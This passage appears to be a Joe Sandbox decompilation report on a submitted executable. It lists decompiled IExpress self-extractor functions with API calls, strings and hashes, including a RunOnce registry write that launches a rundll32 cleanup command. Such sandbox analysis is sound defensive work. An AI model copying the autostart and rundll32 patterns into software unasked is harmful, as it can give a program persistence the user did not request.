                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				void* _t71;
                                                                                                                                                                                                        				char _t76;
                                                                                                                                                                                                        				intOrPtr _t85;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t67 = __ecx;
                                                                                                                                                                                                        				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                        				if(_t66 == 0) {
                                                                                                                                                                                                        					_t63 = 0x4c2;
                                                                                                                                                                                                        					L22:
                                                                                                                                                                                                        					E00E844B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                        				_v12 = _t26;
                                                                                                                                                                                                        				if(_t26 == 0) {
                                                                                                                                                                                                        					L20:
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t63 = 0x4c1;
                                                                                                                                                                                                        					goto L22;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                        				_v20 = _t28;
                                                                                                                                                                                                        				if(_t28 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                        				_v16 = _t29;
                                                                                                                                                                                                        				if(_t29 == 0) {
                                                                                                                                                                                                        					goto L20;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t76 =  *0xe888c0; // 0x0
                                                                                                                                                                                                        				if(_t76 != 0) {
                                                                                                                                                                                                        					L10:
                                                                                                                                                                                                        					 *0xe887a0 = 0;
                                                                                                                                                                                                        					_v52 = _t67;
                                                                                                                                                                                                        					_v48 = 0;
                                                                                                                                                                                                        					_v44 = 0;
                                                                                                                                                                                                        					_v40 = 0xe88598;
                                                                                                                                                                                                        					_v36 = 1;
                                                                                                                                                                                                        					_v32 = E00E84200;
                                                                                                                                                                                                        					_v28 = 0xe888c0;
                                                                                                                                                                                                        					 *0xe8a288( &_v52);
                                                                                                                                                                                                        					_t32 =  *_v12();
                                                                                                                                                                                                        					if(_t71 != _t71) {
                                                                                                                                                                                                        						asm("int 0x29");
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_v12 = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						 *0xe8a288(_t32, 0xe888c0);
                                                                                                                                                                                                        						 *_v16();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *0xe888c0 != 0) {
                                                                                                                                                                                                        							E00E81680(0xe887a0, 0x104, 0xe888c0);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0xe8a288(_v12);
                                                                                                                                                                                                        						 *_v20();
                                                                                                                                                                                                        						if(_t71 != _t71) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t66);
                                                                                                                                                                                                        					_t85 =  *0xe887a0; // 0x0
                                                                                                                                                                                                        					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					GetTempPathA(0x104, 0xe888c0);
                                                                                                                                                                                                        					_t61 = 0xe888c0;
                                                                                                                                                                                                        					_t4 =  &(_t61[1]); // 0xe888c1
                                                                                                                                                                                                        					_t65 = _t4;
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t42 =  *_t61;
                                                                                                                                                                                                        						_t61 =  &(_t61[1]);
                                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                                        					_t5 = _t61 - _t65 + 0xe888c0; // 0x1d11181
                                                                                                                                                                                                        					_t44 = CharPrevA(0xe888c0, _t5);
                                                                                                                                                                                                        					_v8 = _t44;
                                                                                                                                                                                                        					if( *_t44 == 0x5c &&  *(CharPrevA(0xe888c0, _t44)) != 0x3a) {
                                                                                                                                                                                                        						 *_v8 = 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}




























                                                                                                                                                                                                        0x00e84234
                                                                                                                                                                                                        0x00e8423c
                                                                                                                                                                                                        0x00e84240
                                                                                                                                                                                                        0x00e843b2
                                                                                                                                                                                                        0x00e843b7
                                                                                                                                                                                                        0x00e843c0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e843c5
                                                                                                                                                                                                        0x00e8424c
                                                                                                                                                                                                        0x00e84252
                                                                                                                                                                                                        0x00e84257
                                                                                                                                                                                                        0x00e843a4
                                                                                                                                                                                                        0x00e843a5
                                                                                                                                                                                                        0x00e843ab
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e843ab
                                                                                                                                                                                                        0x00e84263
                                                                                                                                                                                                        0x00e84269
                                                                                                                                                                                                        0x00e8426e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8427a
                                                                                                                                                                                                        0x00e84280
                                                                                                                                                                                                        0x00e84285
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8428d
                                                                                                                                                                                                        0x00e84293
                                                                                                                                                                                                        0x00e842e6
                                                                                                                                                                                                        0x00e842e9
                                                                                                                                                                                                        0x00e842ef
                                                                                                                                                                                                        0x00e842f4
                                                                                                                                                                                                        0x00e842f7
                                                                                                                                                                                                        0x00e84300
                                                                                                                                                                                                        0x00e84307
                                                                                                                                                                                                        0x00e8430e
                                                                                                                                                                                                        0x00e84315
                                                                                                                                                                                                        0x00e8431c
                                                                                                                                                                                                        0x00e84322
                                                                                                                                                                                                        0x00e84326
                                                                                                                                                                                                        0x00e8432d
                                                                                                                                                                                                        0x00e8432d
                                                                                                                                                                                                        0x00e8432f
                                                                                                                                                                                                        0x00e84334
                                                                                                                                                                                                        0x00e84343
                                                                                                                                                                                                        0x00e84349
                                                                                                                                                                                                        0x00e8434d
                                                                                                                                                                                                        0x00e84354
                                                                                                                                                                                                        0x00e84354
                                                                                                                                                                                                        0x00e8435d
                                                                                                                                                                                                        0x00e8436e
                                                                                                                                                                                                        0x00e8436e
                                                                                                                                                                                                        0x00e8437d
                                                                                                                                                                                                        0x00e84383
                                                                                                                                                                                                        0x00e84387
                                                                                                                                                                                                        0x00e8438e
                                                                                                                                                                                                        0x00e8438e
                                                                                                                                                                                                        0x00e84387
                                                                                                                                                                                                        0x00e84391
                                                                                                                                                                                                        0x00e84399
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e84295
                                                                                                                                                                                                        0x00e8429f
                                                                                                                                                                                                        0x00e842a5
                                                                                                                                                                                                        0x00e842aa
                                                                                                                                                                                                        0x00e842aa
                                                                                                                                                                                                        0x00e842ad
                                                                                                                                                                                                        0x00e842ad
                                                                                                                                                                                                        0x00e842af
                                                                                                                                                                                                        0x00e842b0
                                                                                                                                                                                                        0x00e842b6
                                                                                                                                                                                                        0x00e842c2
                                                                                                                                                                                                        0x00e842c8
                                                                                                                                                                                                        0x00e842ce
                                                                                                                                                                                                        0x00e842e4
                                                                                                                                                                                                        0x00e842e4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e842ce

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00E84236
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00E8424C
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00E84263
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00E8427A
                                                                                                                                                                                                        • GetTempPathA.KERNEL32(00000104,00E888C0,?,00000001), ref: 00E8429F
                                                                                                                                                                                                        • CharPrevA.USER32(00E888C0,01D11181,?,00000001), ref: 00E842C2
                                                                                                                                                                                                        • CharPrevA.USER32(00E888C0,00000000,?,00000001), ref: 00E842D6
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E84391
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00E843A5
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                        • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                        • API String ID: 1865808269-1731843650
                                                                                                                                                                                                        • Opcode ID: cff1580ce5a590990aa5c4c5b4e943e6e79504cf44c8f41b231de1d49ae16e3c
                                                                                                                                                                                                        • Instruction ID: a98a6a9f574b627656796326961bc5473998d3f39613da100eb918b5cbbee327
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cff1580ce5a590990aa5c4c5b4e943e6e79504cf44c8f41b231de1d49ae16e3c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AE4126B4A00301AFE711BFA1DC88A6E7BB5EB45348F88116AED4DB3291CB758C05C761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E82773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v269;
                                                                                                                                                                                                        				CHAR* _v276;
                                                                                                                                                                                                        				int _v280;
                                                                                                                                                                                                        				void* _v284;
                                                                                                                                                                                                        				int _v288;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				int _t45;
                                                                                                                                                                                                        				int* _t50;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				CHAR* _t61;
                                                                                                                                                                                                        				char* _t62;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				signed int _t65;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t52 = __ecx;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                        				_t62 = _a4;
                                                                                                                                                                                                        				_t50 = 0;
                                                                                                                                                                                                        				_t61 = __ecx;
                                                                                                                                                                                                        				_v276 = _t62;
                                                                                                                                                                                                        				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                        				if( *_t62 != 0x23) {
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					goto L14;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t64 = _t62 + 1;
                                                                                                                                                                                                        					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                        					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                        					_t63 = 0x104;
                                                                                                                                                                                                        					_t34 = _v269;
                                                                                                                                                                                                        					if(_t34 == 0x53) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                        						goto L15;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 == 0x57) {
                                                                                                                                                                                                        							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_push(_t52);
                                                                                                                                                                                                        							_v288 = 0x104;
                                                                                                                                                                                                        							E00E81781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                        							_t59 = 0x104;
                                                                                                                                                                                                        							E00E8658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                        							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                        								L16:
                                                                                                                                                                                                        								_t59 = _t63;
                                                                                                                                                                                                        								E00E8658A(_t61, _t63, _v276);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								if(RegQueryValueExA(_v284, 0xe81140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                        									_t45 = _v280;
                                                                                                                                                                                                        									if(_t45 != 2) {
                                                                                                                                                                                                        										L9:
                                                                                                                                                                                                        										if(_t45 == 1) {
                                                                                                                                                                                                        											goto L10;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        											_t45 = _v280;
                                                                                                                                                                                                        											goto L9;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t59 = 0x104;
                                                                                                                                                                                                        											E00E81680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                        											L10:
                                                                                                                                                                                                        											_t50 = 1;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								RegCloseKey(_v284);
                                                                                                                                                                                                        								L15:
                                                                                                                                                                                                        								if(_t50 == 0) {
                                                                                                                                                                                                        									goto L16;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        0x00e82773
                                                                                                                                                                                                        0x00e8277e
                                                                                                                                                                                                        0x00e82785
                                                                                                                                                                                                        0x00e8278a
                                                                                                                                                                                                        0x00e8278d
                                                                                                                                                                                                        0x00e82790
                                                                                                                                                                                                        0x00e82792
                                                                                                                                                                                                        0x00e82798
                                                                                                                                                                                                        0x00e8279d
                                                                                                                                                                                                        0x00e828b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e827a3
                                                                                                                                                                                                        0x00e827a3
                                                                                                                                                                                                        0x00e827af
                                                                                                                                                                                                        0x00e827c2
                                                                                                                                                                                                        0x00e827c8
                                                                                                                                                                                                        0x00e827cd
                                                                                                                                                                                                        0x00e827d5
                                                                                                                                                                                                        0x00e828b7
                                                                                                                                                                                                        0x00e828b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e827db
                                                                                                                                                                                                        0x00e827dd
                                                                                                                                                                                                        0x00e828aa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e827e3
                                                                                                                                                                                                        0x00e827e3
                                                                                                                                                                                                        0x00e827ec
                                                                                                                                                                                                        0x00e827f8
                                                                                                                                                                                                        0x00e82803
                                                                                                                                                                                                        0x00e8280b
                                                                                                                                                                                                        0x00e82831
                                                                                                                                                                                                        0x00e828c3
                                                                                                                                                                                                        0x00e828c9
                                                                                                                                                                                                        0x00e828cd
                                                                                                                                                                                                        0x00e82837
                                                                                                                                                                                                        0x00e8285a
                                                                                                                                                                                                        0x00e8285c
                                                                                                                                                                                                        0x00e82865
                                                                                                                                                                                                        0x00e82892
                                                                                                                                                                                                        0x00e82895
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e82867
                                                                                                                                                                                                        0x00e82878
                                                                                                                                                                                                        0x00e8288c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8287a
                                                                                                                                                                                                        0x00e82880
                                                                                                                                                                                                        0x00e82885
                                                                                                                                                                                                        0x00e82897
                                                                                                                                                                                                        0x00e82899
                                                                                                                                                                                                        0x00e82899
                                                                                                                                                                                                        0x00e82878
                                                                                                                                                                                                        0x00e82865
                                                                                                                                                                                                        0x00e828a0
                                                                                                                                                                                                        0x00e828bf
                                                                                                                                                                                                        0x00e828c1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e828c1
                                                                                                                                                                                                        0x00e82831
                                                                                                                                                                                                        0x00e827dd
                                                                                                                                                                                                        0x00e827d5
                                                                                                                                                                                                        0x00e828e5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharUpperA.USER32(18391FE1,00000000,00000000,00000000), ref: 00E827A8
                                                                                                                                                                                                        • CharNextA.USER32(0000054D), ref: 00E827B5
                                                                                                                                                                                                        • CharNextA.USER32(00000000), ref: 00E827BC
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82829
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82852
                                                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E82870
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E828A0
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00E828AA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E828B9
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00E827E4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                        • API String ID: 2659952014-2428544900
                                                                                                                                                                                                        • Opcode ID: 5a94e3173313921881a0b9707e65f108583a8e11279b5fa2ff82113f9c8ba0ec
                                                                                                                                                                                                        • Instruction ID: d5699c9f5c9fc0012fc18e5a19fed96dce7080b3b125c9dd0b41476457629e2a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5a94e3173313921881a0b9707e65f108583a8e11279b5fa2ff82113f9c8ba0ec
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1419671A0012CAFEB28AB65DC45AFA77BDEF55700F0440AAF64DF2110DB704E869FA1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                                        			E00E82267() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v836;
                                                                                                                                                                                                        				void* _v840;
                                                                                                                                                                                                        				int _v844;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				intOrPtr _t33;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				intOrPtr* _t42;
                                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				void* _t49;
                                                                                                                                                                                                        				signed int _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t19 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                        				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                        				if( *0xe88530 != 0) {
                                                                                                                                                                                                        					_push(_t49);
                                                                                                                                                                                                        					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                        						_push(_t38);
                                                                                                                                                                                                        						_v844 = 0x238;
                                                                                                                                                                                                        						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                        							_push(_t47);
                                                                                                                                                                                                        							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        								E00E8658A( &_v268, 0x104, 0xe81140);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                        							E00E8171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                        							_t42 =  &_v836;
                                                                                                                                                                                                        							_t45 = _t42 + 1;
                                                                                                                                                                                                        							_pop(_t47);
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t33 =  *_t42;
                                                                                                                                                                                                        								_t42 = _t42 + 1;
                                                                                                                                                                                                        							} while (_t33 != 0);
                                                                                                                                                                                                        							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                        						_pop(_t38);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_pop(_t49);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00e82272
                                                                                                                                                                                                        0x00e82277
                                                                                                                                                                                                        0x00e82279
                                                                                                                                                                                                        0x00e82283
                                                                                                                                                                                                        0x00e82289
                                                                                                                                                                                                        0x00e822ab
                                                                                                                                                                                                        0x00e822b1
                                                                                                                                                                                                        0x00e822c4
                                                                                                                                                                                                        0x00e822e0
                                                                                                                                                                                                        0x00e822e6
                                                                                                                                                                                                        0x00e822f5
                                                                                                                                                                                                        0x00e8230d
                                                                                                                                                                                                        0x00e8231c
                                                                                                                                                                                                        0x00e8231c
                                                                                                                                                                                                        0x00e82321
                                                                                                                                                                                                        0x00e8233a
                                                                                                                                                                                                        0x00e82342
                                                                                                                                                                                                        0x00e82348
                                                                                                                                                                                                        0x00e8234b
                                                                                                                                                                                                        0x00e8234c
                                                                                                                                                                                                        0x00e8234c
                                                                                                                                                                                                        0x00e8234e
                                                                                                                                                                                                        0x00e8234f
                                                                                                                                                                                                        0x00e8236e
                                                                                                                                                                                                        0x00e8236e
                                                                                                                                                                                                        0x00e8237a
                                                                                                                                                                                                        0x00e82380
                                                                                                                                                                                                        0x00e82380
                                                                                                                                                                                                        0x00e82381
                                                                                                                                                                                                        0x00e82381
                                                                                                                                                                                                        0x00e8238f

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00E822A3
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00E822D8
                                                                                                                                                                                                        • memset.MSVCRT ref: 00E822F5
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00E82305
                                                                                                                                                                                                        • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00E8236E
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E8237A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00E8232D
                                                                                                                                                                                                        • wextract_cleanup0, xrefs: 00E8227C, 00E822CD, 00E82363
                                                                                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00E82299
                                                                                                                                                                                                        • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00E82321
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                                                                                                        • API String ID: 3027380567-2036266374
                                                                                                                                                                                                        • Opcode ID: d20c0739ec1e23cb5886f7922e59aa4e385ecad6a1fe796372c00a7a4868acff
                                                                                                                                                                                                        • Instruction ID: d22e6aa51ad65fba9d2889e5da636400530069e73e639269c32432dc62d59b8d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d20c0739ec1e23cb5886f7922e59aa4e385ecad6a1fe796372c00a7a4868acff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F31C571A002186FDB21AB61DD49FEABB7CEB15704F4401EAB94DB6051EA71AF88CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E00E83100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* _t8;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				struct HWND__* _t16;
                                                                                                                                                                                                        				struct HWND__* _t33;
                                                                                                                                                                                                        				struct HWND__* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t8 = _a8 - 0xf;
                                                                                                                                                                                                        				if(_t8 == 0) {
                                                                                                                                                                                                        					if( *0xe88590 == 0) {
                                                                                                                                                                                                        						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                        						 *0xe88590 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L13:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t8 - 1;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L8:
                                                                                                                                                                                                        					EndDialog(_a4, ??);
                                                                                                                                                                                                        					L9:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t15 = _t11 - 0x100;
                                                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                                                        					_t16 = GetDesktopWindow();
                                                                                                                                                                                                        					_t33 = _a4;
                                                                                                                                                                                                        					E00E843D0(_t33, _t16);
                                                                                                                                                                                                        					SetDlgItemTextA(_t33, 0x834,  *0xe88d4c);
                                                                                                                                                                                                        					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                        					SetForegroundWindow(_t33);
                                                                                                                                                                                                        					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                        					 *0xe888b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                        					SetWindowLongA(_t34, 0xfffffffc, E00E830C0);
